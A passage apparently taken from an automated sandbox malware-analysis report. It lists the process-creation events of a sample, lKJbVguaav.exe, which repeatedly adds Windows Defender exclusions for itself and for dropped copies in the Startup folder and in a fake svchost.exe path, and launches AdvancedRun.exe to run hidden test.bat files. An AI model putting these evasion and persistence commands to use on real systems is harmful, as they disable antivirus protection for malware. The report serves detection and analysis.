                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe'
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\Desktop\lKJbVguaav.exe C:\Users\user\Desktop\lKJbVguaav.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6396 -ip 6396
                      Source: unknownProcess created: C:\Program Files\Common Files\system\E59A6148\svchost.exe 'C:\Program Files\Common Files\System\E59A6148\svchost.exe'
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1860
                      Source: unknownProcess created: C:\Program Files\Common Files\system\E59A6148\svchost.exe 'C:\Program Files\Common Files\System\E59A6148\svchost.exe'
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /SpecialRun 4101d8 2540
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /SpecialRun 4101d8 3712
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /SpecialRun 4101d8 5616
                      Source: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /SpecialRun 4101d8 2028
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\Desktop\lKJbVguaav.exe C:\Users\user\Desktop\lKJbVguaav.exeJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1860Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /SpecialRun 4101d8 6924Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6396 -ip 6396
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
